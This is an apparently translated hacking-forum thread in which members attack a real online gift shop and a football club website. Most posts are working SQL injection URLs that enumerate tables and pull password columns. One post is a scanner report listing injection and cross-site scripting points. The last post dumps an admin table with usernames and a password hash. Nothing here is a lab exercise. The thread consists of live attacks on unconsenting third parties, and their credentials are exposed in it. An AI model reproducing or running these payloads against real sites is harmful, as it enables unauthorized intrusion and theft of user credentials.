Anyone want to continue this? [SQL Injection]
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Discussion of bugs, penetration, exploitation, and techniques for securing websites and web servers. Include a POC here so members can learn from it.
-
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Anyone want to continue this? [SQL Injection]
Please head to the scene (TKP)
Re: Anyone want to continue this? [SQL Injection]
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+SELECT+1,column_name,3,4,5,6+FROM+information_schema.columns+where+table_name=0x6163636573732d636f6e74726f6c2d7573657273--
Re: Anyone want to continue this? [SQL Injection]
I can't play around with SQL, so I'm just sitting here watching with my mat rolled out.. watching the masters in action
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>table{table-layout:fixed;overflow:hidden;}</style><title>
Scan Report
</title>
</head><body>
<center>
<br><br><br><br><br><br><br><br><h1>
Xcode Scan Report<br>
</h1><br><br><br><br><br><br><br><br>Made By Sinichi<br><br><br><br><br><br><br><br>Created By Xcode - Web Vulnerability Scanner<br>2010-01-31<div style="page-break-after:always"> </div><h2>
Vulnerability Result
</h2><table border="1" width="640" cellspacing="0" bordercolordark="009099">
<tr><td>URL</td><td>Type</td><td>KeyWord</td><td>Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION+SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6 FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x6163636573732d636f6e74726f6c2d7573657273--</td><td>GET</td><td>http://www.essaygifts.co.za/catalogue-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>Integer</td><td>upload</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>GET</td><td>http://www.essaygifts.co.za/product-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>POST</td><td>http://www.essaygifts.co.za/product-list.php|search=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(Form)</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>Integer</td><td>html</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>GET</td><td>http://www.essaygifts.co.za/product.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td></td></tr>
</table><br>
</center>
</body>
</html>
Just Newbie
Re: Anyone want to continue this? [SQL Injection]
Come on, keep your spirits up.. search the forum and then practice on that site.. hahaha..
-
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: Anyone want to continue this? [SQL Injection]
Oh, mercy,, :circle:
Failed again, failed again :putusasa:
-
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: Anyone want to continue this? [SQL Injection]
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+ALL+SELECT+1,GROUP_CONCAT(id,0x3a,password),3,4,5,6+FROM+0x6163636573732d636f6e74726f6c2d7573657273--
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION%20SELECT+1,GROUP_CONCAT%28id,0x3a,password%29,3,4,5,6+FROM+access-control-user--
:pusing:
Re: Anyone want to continue this? [SQL Injection]
hmmmadit_coolz wrote: Please head to the scene (TKP)
Sorry, I'm still just trying things out,, if there are any mistakes, I ask for corrections from all the masters here :kaca: http://www.essaygifts.co.za/catalogue-list.php?id=2 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--
Server = Apache/1.3.34 (Debian) mod_auth_pam/1.1.1 mod_gzip/1.3.26.1a mod_perl/1.29 mod_fastcgi/2.4.2 AuthMySQL/4.3.9-2 mod_ssl/2.8.25 OpenSSL/0.9.8c
Version = 5.0.32-Debian_7etch11
Powered by = PHP/5.2.0-8+etch16
Attack Type = SQL Union Injection
Current User = [email protected]
Current Database = essayh_db1
Supports Union = yes
Union Columns = 6
There will never be a perfect human being
-
- Posts: 13
- Joined: Sun Aug 26, 2007 6:59 pm
- Location: pAradIse
Re: Anyone want to continue this? [SQL Injection]
Confused by the one above.. went looking again.. hey, got this one...
+] URL:http://www.juventus.co.id/pages.php?id_ ... de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3
[0] dana:dana:
[1] Mazh
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:
:kaca: :love: